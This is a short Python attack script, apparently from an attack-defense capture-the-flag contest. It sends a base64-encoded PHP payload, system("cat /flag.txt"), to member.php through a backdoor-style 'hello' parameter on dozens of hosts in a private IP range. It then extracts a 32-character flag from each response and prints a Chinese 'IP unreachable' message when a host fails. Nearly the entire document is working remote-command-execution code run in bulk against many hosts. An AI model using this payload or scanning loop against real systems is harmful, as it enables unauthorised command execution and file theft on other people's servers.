1. import requests, re, base64
    2. weba_hosts = ["http://172.20.%s.103" % x for x in range(101,147)]
    3. s = requests.session()
    4. payload = base64.b64encode(b'system("cat /flag.txt");')
    5. params = {"hello": payload}
    6. for web_a in weba_hosts:
    7. try:
    8. resp = requests.get(url=web_a,timeout=1)
    9. resp = s.get(web_a+"/member.php",params=params)
    10. rs = re.search(r"\w{32}",resp.text)
    11. print(web_a)
    12. print(rs.group())
    13. except:
    14. print(web_a)
    15. print("IP无法访问")